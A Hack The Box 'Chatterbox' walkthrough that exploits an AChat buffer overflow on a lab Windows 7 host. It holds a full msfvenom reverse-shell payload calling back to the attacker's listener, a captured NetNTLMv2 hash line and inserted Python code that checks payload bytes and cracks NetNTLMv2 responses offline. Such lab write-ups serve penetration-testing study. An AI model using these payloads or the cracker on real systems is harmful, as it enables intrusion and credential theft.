Chatterbox-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: service version detection on ports 9255 and 9256, remote command execution against the AChat service, file transfer over SMB, changing file permissions with icacls and cacls, directory permission enumeration

Reference: https://www.jgeek.cn/article/111.html

0x01 Obtaining user access

1. Target IP address: 10.10.10.74

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.74 -oG allports
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 16:44 CST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.74
Host is up (0.33s latency).
Not shown: 65042 closed tcp ports (reset), 482 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
9255/tcp open mon
9256/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
135,139,445,9255,9256,49152,49153,49154,49155,49156,49157,
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 --min-rate=10000 -sC -sV 10.10.10.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 16:46 CST
Nmap scan report for 10.10.10.74
Host is up (0.48s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open tcpwrapped
9256/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open unknown
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-28T13:47:39
|_ start_date: 2024-03-28T13:41:33
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-03-28T09:47:41-04:00
|_clock-skew: mean: 6h20m01s, deviation: 2h18m38s, median: 4h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.25 seconds
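The grep/awk pipeline above also matches ports that nmap reports as open|filtered, because the pattern only looks for the "/open" prefix. The added example below (my code, not from the writeup) parses the -oG Ports field properly and keeps only TCP ports whose state is exactly open. The -oG text is constructed from the scan above; the 9257 open|filtered UDP entry is invented to show the edge case.

```python
"""Parse nmap grepable (-oG) output into the port list for the -sC -sV
follow-up. Added example, not part of the original writeup."""

# Constructed -oG text modelled on the allports scan above; the
# 9257/open|filtered/udp entry is invented to exercise the edge case.
SAMPLE_OG = (
    "# Nmap 7.94SVN scan initiated as: nmap -p- --min-rate=10000 10.10.10.74 -oG allports\n"
    "Host: 10.10.10.74 ()\tStatus: Up\n"
    "Host: 10.10.10.74 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 9255/open/tcp//mon///, 9256/open/tcp//unknown///, "
    "9257/open|filtered/udp//unknown///, 49152/open/tcp//unknown///"
    "\tIgnored State: closed (65042)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 28.02 seconds\n"
)


def parse_og(text):
    """Return {host: [(port, state, proto, service), ...]} from -oG text.

    Each Ports entry is port/state/protocol/owner/service/rpcinfo/version/.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and Status-only lines carry no ports
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for item in ports_field.split(","):
            item = item.strip()
            if not item:
                continue
            parts = item.split("/")
            results.setdefault(host, []).append(
                (int(parts[0]), parts[1], parts[2], parts[4]))
    return results


def open_tcp_ports(text, host):
    """Ports whose state is exactly 'open' (open|filtered is not proof)."""
    return sorted(port for port, state, proto, _svc in parse_og(text).get(host, [])
                  if state == "open" and proto == "tcp")


def port_arg(text, host):
    """The comma-separated value to hand to nmap -p."""
    return ",".join(str(p) for p in open_tcp_ports(text, host))


if __name__ == "__main__":
    print(port_arg(SAMPLE_OG, "10.10.10.74"))
```

Run it against the real allports file with open(...).read() in place of SAMPLE_OG; the output drops straight into the -p argument of the second scan.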

3. This is where my enumeration hit a snag. Ports 9255 and 9256 had not shown up on earlier boxes and sit below 10000, yet the -sC -sV run above only reported them as tcpwrapped: the TCP handshake completed but the service closed the connection before nmap's probes got a reply, which can happen when a version scan is pushed with a high --min-rate. Re-probing just those two ports at the default rate identifies the service:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p9255,9256 -sV 10.10.10.74
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 17:19 CST
Nmap scan report for 10.10.10.74
Host is up (0.49s latency).

PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
9256/tcp open achat AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

4. With the service identified, search for known vulnerabilities in it.

Achat is vulnerable to an SEH-based stack buffer overflow - https://www.speedguide.net/port.php?port=9256

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit AChat
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

5. Pull the exploit down and work out how to use it

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 36025
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/36025
Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/Desktop/36025.py

6. Reading the PoC source shows that only two things need changing: the shellcode and the target address. The PoC's header records how its payload was generated, and the msfvenom line below keeps those options: the bug is a Unicode SEH overflow, so the payload is encoded with x86/unicode_mixed, 0x00 and every byte from 0x80 to 0xff are excluded with -b, and BufferRegister=EAX tells the decoder which register points at the payload. Swap in a reverse shell aimed at the attacker's address and port:

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x79\x6c\x58\x68\x52\x62\x79\x70"
buf += b"\x79\x70\x4d\x30\x31\x50\x52\x69\x6b\x35\x4d\x61"
buf += b"\x59\x30\x51\x54\x62\x6b\x70\x50\x30\x30\x64\x4b"
buf += b"\x31\x42\x5a\x6c\x54\x4b\x70\x52\x7a\x74\x44\x4b"
buf += b"\x31\x62\x6e\x48\x6c\x4f\x48\x37\x6d\x7a\x6f\x36"
buf += b"\x50\x31\x4b\x4f\x56\x4c\x6f\x4c\x33\x31\x53\x4c"
buf += b"\x7a\x62\x6e\x4c\x6b\x70\x56\x61\x68\x4f\x6c\x4d"
buf += b"\x4a\x61\x49\x37\x48\x62\x6c\x32\x6f\x62\x6e\x77"
buf += b"\x54\x4b\x6e\x72\x6e\x30\x52\x6b\x6f\x5a\x4f\x4c"
buf += b"\x54\x4b\x6e\x6c\x4c\x51\x74\x38\x4b\x33\x31\x38"
buf += b"\x79\x71\x56\x71\x72\x31\x44\x4b\x51\x49\x6d\x50"
buf += b"\x39\x71\x47\x63\x74\x4b\x6f\x59\x4c\x58\x37\x73"
buf += b"\x6e\x5a\x70\x49\x62\x6b\x6f\x44\x54\x4b\x6b\x51"
buf += b"\x77\x66\x4e\x51\x59\x6f\x76\x4c\x77\x51\x66\x6f"
buf += b"\x4a\x6d\x6b\x51\x75\x77\x6d\x68\x59\x50\x31\x65"
buf += b"\x68\x76\x59\x73\x51\x6d\x39\x68\x4f\x4b\x43\x4d"
buf += b"\x4c\x64\x50\x75\x47\x74\x42\x38\x64\x4b\x62\x38"
buf += b"\x6c\x64\x4a\x61\x76\x73\x70\x66\x72\x6b\x6c\x4c"
buf += b"\x50\x4b\x74\x4b\x71\x48\x6b\x6c\x6d\x31\x68\x53"
buf += b"\x42\x6b\x59\x74\x42\x6b\x6b\x51\x36\x70\x54\x49"
buf += b"\x31\x34\x6e\x44\x6b\x74\x4f\x6b\x31\x4b\x50\x61"
buf += b"\x4e\x79\x51\x4a\x50\x51\x69\x6f\x37\x70\x51\x4f"
buf += b"\x51\x4f\x51\x4a\x74\x4b\x6d\x42\x5a\x4b\x44\x4d"
buf += b"\x4f\x6d\x51\x58\x4c\x73\x30\x32\x6b\x50\x79\x70"
buf += b"\x63\x38\x32\x57\x31\x63\x4d\x62\x4f\x6f\x32\x34"
buf += b"\x4f\x78\x50\x4c\x31\x67\x4e\x46\x39\x77\x4b\x4f"
buf += b"\x39\x45\x75\x68\x42\x70\x4d\x31\x59\x70\x4b\x50"
buf += b"\x6e\x49\x77\x54\x4e\x74\x52\x30\x31\x58\x4b\x79"
buf += b"\x71\x70\x32\x4b\x4d\x30\x79\x6f\x47\x65\x70\x50"
buf += b"\x70\x50\x52\x30\x42\x30\x4f\x50\x52\x30\x6d\x70"
buf += b"\x4e\x70\x6f\x78\x79\x5a\x4a\x6f\x69\x4f\x77\x70"
buf += b"\x69\x6f\x68\x55\x52\x77\x42\x4a\x49\x75\x53\x38"
buf += b"\x4a\x6a\x6b\x5a\x4a\x6e\x4a\x6b\x32\x48\x4d\x32"
buf += b"\x39\x70\x4b\x51\x57\x4b\x55\x39\x4a\x46\x30\x6a"
buf += b"\x4e\x30\x50\x56\x6f\x67\x63\x38\x63\x69\x35\x55"
buf += b"\x70\x74\x73\x31\x4b\x4f\x77\x65\x32\x65\x55\x70"
buf += b"\x30\x74\x6c\x4c\x6b\x4f\x6e\x6e\x4c\x48\x42\x55"
buf += b"\x68\x6c\x6f\x78\x68\x70\x76\x55\x46\x42\x51\x46"
buf += b"\x4b\x4f\x77\x65\x73\x38\x72\x43\x32\x4d\x43\x34"
buf += b"\x6b\x50\x33\x59\x57\x73\x70\x57\x61\x47\x72\x37"
buf += b"\x70\x31\x6b\x46\x51\x5a\x4c\x52\x50\x59\x70\x56"
buf += b"\x79\x52\x79\x6d\x43\x36\x65\x77\x4e\x64\x6d\x54"
buf += b"\x6d\x6c\x79\x71\x79\x71\x32\x6d\x61\x34\x4f\x34"
buf += b"\x5a\x70\x69\x36\x4b\x50\x31\x34\x6e\x74\x50\x50"
buf += b"\x6f\x66\x50\x56\x51\x46\x4f\x56\x42\x36\x70\x4e"
buf += b"\x4e\x76\x62\x36\x52\x33\x30\x56\x6f\x78\x74\x39"
buf += b"\x76\x6c\x6d\x6f\x43\x56\x59\x6f\x69\x45\x52\x69"
buf += b"\x59\x50\x4e\x6e\x70\x56\x4f\x56\x79\x6f\x4e\x50"
buf += b"\x43\x38\x79\x78\x45\x37\x4b\x6d\x63\x30\x4b\x4f"
buf += b"\x46\x75\x77\x4b\x38\x70\x38\x35\x37\x32\x62\x36"
buf += b"\x51\x58\x55\x56\x45\x45\x57\x4d\x55\x4d\x49\x6f"
buf += b"\x4a\x35\x6d\x6c\x6c\x46\x33\x4c\x4a\x6a\x43\x50"
buf += b"\x4b\x4b\x4b\x30\x33\x45\x6c\x45\x55\x6b\x31\x37"
buf += b"\x4b\x63\x34\x32\x42\x4f\x61\x5a\x79\x70\x52\x33"
buf += b"\x49\x6f\x46\x75\x41\x41"
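Before firing a freshly generated payload it is worth checking it against the constraints the exploit imposes. The added example below (my code, not from the PoC or the writeup) builds the same bad-character set as the -b argument above, parses msfvenom's -f python output back into bytes, reports any offending byte, and shows what the payload becomes once the server widens it to UTF-16LE, which is why every byte has to survive as XX 00. SAMPLE is constructed from the first two data lines of the msfvenom output above.

```python
"""Check an msfvenom payload against the constraints of the AChat Unicode
overflow before sending it. Added example, not from the PoC or the writeup."""


def achat_badchars():
    """The -b set used above: NUL plus every byte from 0x80 to 0xff."""
    return bytes([0x00]) + bytes(range(0x80, 0x100))


def msfvenom_b_arg(bad):
    """Render a byte set as the '\\x..' string that msfvenom -b expects."""
    return "".join("\\x%02x" % b for b in bad)


def parse_msfvenom_python(text):
    """Turn msfvenom -f python output (buf += b"...") back into raw bytes."""
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('buf += b"') and line.endswith('"'):
            literal = line[len('buf += b"'):-1]
            # unicode_escape resolves the \xNN escapes; latin-1 keeps one byte each
            out += literal.encode("ascii").decode("unicode_escape").encode("latin-1")
    return bytes(out)


def find_badchars(payload, bad):
    """(offset, byte) pairs the target would truncate or mangle."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def widen(payload):
    """What the server holds after the ASCII -> UTF-16LE expansion: every
    byte becomes XX 00, the property that unicode_mixed output relies on.
    Only the 0x01-0x7f path is modelled; higher bytes are code-page dependent."""
    return payload.decode("latin-1").encode("utf-16le")


def check(payload, bad=None):
    """True when the payload contains none of the forbidden bytes."""
    return not find_badchars(payload, achat_badchars() if bad is None else bad)


# Constructed sample: the first two data lines of the msfvenom output above.
SAMPLE = r'''buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
'''

if __name__ == "__main__":
    payload = parse_msfvenom_python(SAMPLE)
    print(len(payload), "bytes ->", len(widen(payload)), "bytes on the target")
    print("bad bytes:", find_badchars(payload, achat_badchars()))
```

Paste the full msfvenom output in place of SAMPLE: a clean run prints an empty bad-byte list and a widened size of exactly twice the payload size, which is the budget the PoC's buffer has to hold.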

7. Replace the shellcode in the PoC with the buf above, set the target address to 10.10.10.74, start a listener on 443 and run it. It actually took several attempts before it worked.

┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 36025.py
---->{P00F}!

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Windows\system32>

8. Next, read the first flag

C:\Windows\system32>net time /domain
net time /domain
Could not find the domain controller for domain WORKGROUP.

More help is available by typing NET HELPMSG 3913.


C:\Windows\system32>cd C:/Users/alfred/Desktop
cd C:/Users/alfred/Desktop

C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304

Directory of C:\Users\Alfred\Desktop

12/10/2017 07:50 PM <DIR> .
12/10/2017 07:50 PM <DIR> ..
03/28/2024 09:42 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,346,927,616 bytes free

C:\Users\Alfred\Desktop>type user.txt
type user.txt
c6901715ed8c01797bfa79a3be759668

C:\Users\Alfred\Desktop>

0x02 Obtaining system access

9. The quick check above (net time /domain) shows there is no domain, so continue with local information gathering

C:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 3/28/2024, 9:41:25 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,560 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,634 MB
Virtual Memory: In Use: 461 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB2479943
[08]: KB2491683
[09]: KB2506212
[10]: KB2506928
[11]: KB2509553
[12]: KB2533552
[13]: KB2534111
[14]: KB2545698
[15]: KB2547666
[16]: KB2552343
[17]: KB2560656
[18]: KB2563227
[19]: KB2564958
[20]: KB2574819
[21]: KB2579686
[22]: KB2604115
[23]: KB2620704
[24]: KB2621440
[25]: KB2631813
[26]: KB2639308
[27]: KB2640148
[28]: KB2647753
[29]: KB2654428
[30]: KB2660075
[31]: KB2667402
[32]: KB2676562
[33]: KB2685811
[34]: KB2685813
[35]: KB2690533
[36]: KB2698365
[37]: KB2705219
[38]: KB2719857
[39]: KB2726535
[40]: KB2727528
[41]: KB2729094
[42]: KB2732059
[43]: KB2732487
[44]: KB2736422
[45]: KB2742599
[46]: KB2750841
[47]: KB2761217
[48]: KB2763523
[49]: KB2770660
[50]: KB2773072
[51]: KB2786081
[52]: KB2799926
[53]: KB2800095
[54]: KB2807986
[55]: KB2808679
[56]: KB2813430
[57]: KB2820331
[58]: KB2834140
[59]: KB2840631
[60]: KB2843630
[61]: KB2847927
[62]: KB2852386
[63]: KB2853952
[64]: KB2857650
[65]: KB2861698
[66]: KB2862152
[67]: KB2862330
[68]: KB2862335
[69]: KB2864202
[70]: KB2868038
[71]: KB2871997
[72]: KB2884256
[73]: KB2891804
[74]: KB2892074
[75]: KB2893294
[76]: KB2893519
[77]: KB2894844
[78]: KB2900986
[79]: KB2908783
[80]: KB2911501
[81]: KB2912390
[82]: KB2918077
[83]: KB2919469
[84]: KB2923545
[85]: KB2931356
[86]: KB2937610
[87]: KB2943357
[88]: KB2952664
[89]: KB2966583
[90]: KB2968294
[91]: KB2970228
[92]: KB2972100
[93]: KB2973112
[94]: KB2973201
[95]: KB2973351
[96]: KB2977292
[97]: KB2978742
[98]: KB2984972
[99]: KB2985461
[100]: KB2991963
[101]: KB2992611
[102]: KB3003743
[103]: KB3004361
[104]: KB3004375
[105]: KB3006121
[106]: KB3006137
[107]: KB3010788
[108]: KB3011780
[109]: KB3013531
[110]: KB3020370
[111]: KB3020388
[112]: KB3021674
[113]: KB3021917
[114]: KB3022777
[115]: KB3023215
[116]: KB3030377
[117]: KB3035126
[118]: KB3037574
[119]: KB3042058
[120]: KB3045685
[121]: KB3046017
[122]: KB3046269
[123]: KB3054476
[124]: KB3055642
[125]: KB3059317
[126]: KB3060716
[127]: KB3061518
[128]: KB3067903
[129]: KB3068708
[130]: KB3071756
[131]: KB3072305
[132]: KB3074543
[133]: KB3075226
[134]: KB3078601
[135]: KB3078667
[136]: KB3080149
[137]: KB3084135
[138]: KB3086255
[139]: KB3092627
[140]: KB3093513
[141]: KB3097989
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74

C:\Users\Alfred\Desktop>

10. With 183 hotfixes installed, going straight for a kernel exploit is probably hopeless. Next, stand up an SMB share with impacket and put winpeas.exe on it. Note that impacket-smbserver also logs the NetNTLMv2 response of whoever connects (the Alfred::CHATTERBOX:... line below, already in hashcat -m 5600 layout), so hosting a share this way captures credential material as a side effect.

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ impacket-smbserver share . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.74,49159)
[*] AUTHENTICATE_MESSAGE (CHATTERBOX\Alfred,CHATTERBOX)
[*] User CHATTERBOX\Alfred authenticated successfully
[*] Alfred::CHATTERBOX:aaaaaaaaaaaaaaaa:2aad644ab41de7d9109df296923b7bde:0101000000000000804d87e1f380da010d7b9e7d8295d61f00000000010010006a0047007a0058005100790059007800030010006a0047007a00580051007900590078000200100076004500730073006300510041006300040010007600450073007300630051004100630007000800804d87e1f380da01060004000200000008003000300000000000000000000000002000008af90681e870d358ce4dc5c0e7563e131c4a218f0517f193a4a9512bfa9f8fb30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found winPEASx64.exe
[-] SMB2_TREE_CONNECT not found winPEASx64.exe
[*] Connecting Share(2:share)


C:\Users\Alfred\Desktop>copy \\10.10.14.11\share\winPEASx86.exe .
copy \\10.10.14.11\share\winPEASx86.exe .
1 file(s) copied.

C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304

Directory of C:\Users\Alfred\Desktop

03/28/2024 10:45 AM <DIR> .
03/28/2024 10:45 AM <DIR> ..
03/28/2024 09:42 AM 34 user.txt
12/19/2023 10:16 AM 2,387,456 winPEASx64.exe
01/20/2024 02:10 AM 2,388,480 winPEASx86.exe
3 File(s) 4,775,970 bytes
2 Dir(s) 3,338,907,648 bytes free

C:\Users\Alfred\Desktop>
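The Alfred::CHATTERBOX:aaaaaaaaaaaaaaaa:... line that impacket-smbserver printed is the NetNTLMv2 response of the account that mounted the share. The added example below (my code, not the writeup's and not impacket's) shows what that line contains and why it is sensitive: the NT hash is MD4 of the UTF-16LE password, the NTLMv2 key is HMAC-MD5 over the upper-cased user and the domain, and the 16-byte proof is HMAC-MD5 over the server challenge and the client blob, so any candidate password can be tested offline. MD4 is implemented in pure Python because hashlib's md4 is often missing on OpenSSL 3 builds. The sample line is built from a constructed blob and the AutoLogon password winPEAS reports later, not from the captured line; to test the real capture, pass the full line from the impacket output to verify() or crack().

```python
"""What the NetNTLMv2 line logged by impacket-smbserver contains, and how a
candidate password is tested against it offline. Added example, not from
the writeup or from impacket."""
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable on
    OpenSSL 3 builds). Needed because the NT hash is MD4 of the password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, _rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password, user, domain):
    """NTLMv2 hash: HMAC-MD5 keyed by the NT hash over UPPER(user)+domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def ntproof(password, user, domain, server_challenge, blob):
    """The 16-byte NTProofStr: HMAC-MD5 over server challenge || client blob."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, "md5").digest()


def parse_5600(line):
    """hashcat -m 5600 layout, as impacket prints it: user::domain:challenge:proof:blob"""
    user, _empty, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def build_5600(password, user, domain, server_challenge, blob):
    proof = ntproof(password, user, domain, server_challenge, blob)
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def verify(line, password):
    user, domain, chal, proof, blob = parse_5600(line)
    return hmac.compare_digest(ntproof(password, user, domain, chal, blob), proof)


def crack(line, candidates):
    """First candidate whose NTProofStr matches, or None: what hashcat does."""
    for pw in candidates:
        if verify(line, pw):
            return pw
    return None


# Constructed inputs: impacket's fixed challenge as printed above and an
# arbitrary NTLMv2 blob (timestamp, client nonce and target info are made up).
CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")
BLOB = bytes.fromhex(
    "0101000000000000" "804d87e1f380da01" "0d7b9e7d8295d61f" "00000000"
    "02001400430048004100540054004500520042004f005800" "0000000000000000")
SAMPLE_LINE = build_5600("Welcome1!", "Alfred", "CHATTERBOX", CHALLENGE, BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["Password1", "Welcome1!"]))
```

The practical consequence: a share hosted from an attack box should be treated as a credential capture point, and on a real engagement the same line is what Responder-style tooling would hand to hashcat.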

